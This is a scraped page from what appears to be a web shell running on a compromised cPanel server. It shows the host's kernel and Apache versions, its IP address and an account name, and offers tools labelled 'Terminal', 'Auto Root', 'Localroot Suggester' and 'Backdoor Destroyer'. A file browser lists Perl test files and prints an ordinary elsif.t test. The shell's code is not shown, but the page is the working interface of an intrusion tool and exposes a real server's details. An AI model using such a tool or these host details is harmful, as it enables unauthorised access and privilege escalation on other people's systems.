Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
t /
cmd /
Delete
Unzip
Name
Size
Permission
Date
Action
elsif.t
463
B
-r--r--r--
2014-12-27 11:49
for.t
1.98
KB
-r--r--r--
2014-12-27 11:49
mod.t
1.08
KB
-r--r--r--
2014-12-27 11:49
subval.t
3.7
KB
-r--r--r--
2014-12-27 11:49
switch.t
1.42
KB
-r--r--r--
2014-12-27 11:49
Save
Rename
#!./perl sub foo { if ($_[0] == 1) { 1; } elsif ($_[0] == 2) { 2; } elsif ($_[0] == 3) { 3; } else { 4; } } print "1..4\n"; if (($x = &foo(1)) == 1) {print "ok 1\n";} else {print "not ok 1 '$x'\n";} if (($x = &foo(2)) == 2) {print "ok 2\n";} else {print "not ok 2 '$x'\n";} if (($x = &foo(3)) == 3) {print "ok 3\n";} else {print "not ok 3 '$x'\n";} if (($x = &foo(4)) == 4) {print "ok 4\n";} else {print "not ok 4 '$x'\n";}